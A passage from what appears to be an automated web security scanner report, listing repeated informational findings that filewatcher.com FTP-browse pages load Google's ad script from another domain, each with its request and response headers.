Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 745
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.919. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qZyelIJoKPNJXor9daDp4Q"
Content-Length: 7944
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 745
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.920. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/Fu95NTh1JthXPiRtJIo6Q"
Content-Length: 6128
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 747
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.921. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eCAiTRzqOBO/EENKEemz/A"
Content-Length: 10921
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 750
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.922. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JObSaJsDKme/IGb3qH98bQ"
Content-Length: 6764
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 750
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.923. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools/headers.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools/headers.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools/headers.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IshrHJdRqRqRj2W53teqbg"
Content-Length: 22935
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 754
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.924. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xCg5FUdXQO+NojFE2qm4EQ"
Content-Length: 5684
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 544
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/ - FTP Brows
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.925. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "itwI89L7MLyy4ZxIfzkSSw"
Content-Length: 5801
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 544
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.926. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "k19iBFqxBaya1CYYp4mQKg"
Content-Length: 8738
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 545
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.927. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZCi2F8p63kVLp9MLxiOMpg"
Content-Length: 5992
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 546
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.928. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HC+Xt/4q5gAESBsFLZ+a1Q"
Content-Length: 14115
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 581
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.929. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "t+lTMe/Vu/q2jWMbWEf/TA"
Content-Length: 8511
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 588
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.930. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "F4A0WsJ6se35H2mDeGEdnw"
Content-Length: 9311
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 611
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.931. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:03 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4KPZtU63nKUbZoh0sOgdKQ"
Content-Length: 26899
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 612
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.932. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/amd64/packages-5-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:04 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B9ihc5jTPku4VgkRXu2sPQ"
Content-Length: 36867
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 612
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.933. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XgNyngeJ38+4HHKDTXJpLA"
Content-Length: 9975
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 604
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.934. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "YEIOuiFr2KmVnOo+Ix0mSA"
Content-Length: 26788
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 605
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.935. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports/i386/packages-5-stable/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
